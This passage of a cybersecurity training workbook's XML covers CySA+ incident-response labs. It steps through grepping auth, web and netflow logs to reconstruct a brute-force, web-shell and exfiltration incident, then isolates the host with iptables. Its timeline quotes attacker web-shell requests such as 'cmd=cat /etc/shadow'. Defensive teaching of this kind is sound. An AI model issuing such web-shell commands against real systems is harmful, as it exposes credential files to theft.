        <w:t>Step 2 — Triage with simple greps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5  203.0.113.7 flagged — the brute-force source. Same pattern as Lab 7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Pivot to the first success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "Accepted" auth.log | grep 203.0.113.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>08:00:06 root from 203.0.113.7 — the brute-force succeeded after 5 tries in 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Pivot to the web layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep 203.0.113.7 web.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The same IP uploaded shell.php two seconds after login and immediately executed id and cat /etc/shadow. That confirms a web shell (CySA+ "Malicious processes", "Unauthorized software").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Pivot to the data exfil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep -E "[0-9]{9,}" netflow.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A 1.07 GB flow from 10.0.0.50 to 185.220.101.45 at 08:10 — the exfiltration. The internal host is now confirmed compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Build the incident timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; timeline.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Time (UTC)        | Source           | Event                                   | Evidence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08:00:01–08:00:05 | 203.0.113.7      | 5 failed root SSH attempts               | auth.log               |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:00:06          | 203.0.113.7      | Accepted password root                   | auth.log               |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:00:08          | 203.0.113.7      | GET /admin → 200                         | web.log                |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:00:09          | 203.0.113.7      | POST /upload.php (web shell drop)        | web.log                |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:00:11          | 203.0.113.7      | GET shell.php?cmd=id (RCE)               | web.log                |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:01:00          | 203.0.113.7      | shell.php?cmd=cat /etc/shadow            | web.log                |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:10:00          | 10.0.0.50 → 185.220.101.45 :443 | 1 GB outbound exfil       | netflow.log            |</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cat timeline.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This table is dropped straight into the executive incident report (Lab 27) under "Timeline".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Use journalctl for live systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On the real host, the same workflow against systemd:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>journalctl _SYSTEMD_UNIT=ssh.service --since "2026-05-13 08:00" --until "2026-05-13 08:15"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>journalctl -p err --since "1 hour ago"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>journalctl --grep "Failed password|Accepted"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-p err filters by priority. --grep is a regex across all messages — invaluable when you do not know which unit logged the line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — IoC list extracted from the analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; iocs.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip,203.0.113.7,brute-force source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip,185.220.101.45,exfil destination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>file,/var/www/html/uploads/shell.php,web shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user,root,compromised local account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Feed this list into the Threat Intel pipeline (Lab 10) and the containment script (Lab 24).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pivot across auth, web, and netflow logs from a single starting IoC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build an incident timeline that maps cleanly to the kill chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use journalctl to do the same on a live systemd host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Produce a structured IoC list ready for containment and reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Regex Generator (https://alfredang.github.io/regexgenerator/) — a browser tool that builds and tests regular expressions for log parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Regex Generator to craft the log-parsing expressions you apply during incident-response log analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to pivot across auth, web, and netflow logs from a single starting IoC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 24 — Containment with Host Isolation</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isolate a compromised host with iptables / nftables, apply compensating controls, and verify that the box can still reach the SOC analyst workstation but nothing else.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will isolate a compromised host with iptables / nftables, apply compensating controls, and verify that the box can still reach the SOC analyst workstation but nothing else. This maps to CySA+ 3.2 (Containment, eradication, and recovery — Scope, Impact, Isolation, Remediation, Re-imaging, Compensating controls).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y iptables nftables iproute2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Snapshot current connectivity (scope of impact)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip addr | grep -A1 'state UP'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -tunap | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Record what is talking to what — this is the "Scope" and "Impact" assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Define the SOC bastion (your management channel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SOC_IP=10.10.0.10      # your analyst workstation / EDR console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SOC_PORTS=22           # leave only the channel you trust</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Containment that locks you out is useless. Always allow your own management path explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Apply a "network isolation" policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -P INPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -P OUTPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -P FORWARD DROP</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iptables -A INPUT  -i lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -A OUTPUT -o lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -A INPUT  -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT</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iptables -A INPUT  -s $SOC_IP -p tcp --dport $SOC_PORTS -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iptables -A OUTPUT -d $SOC_IP -p tcp --sport $SOC_PORTS -j ACCEPT</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iptables -S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
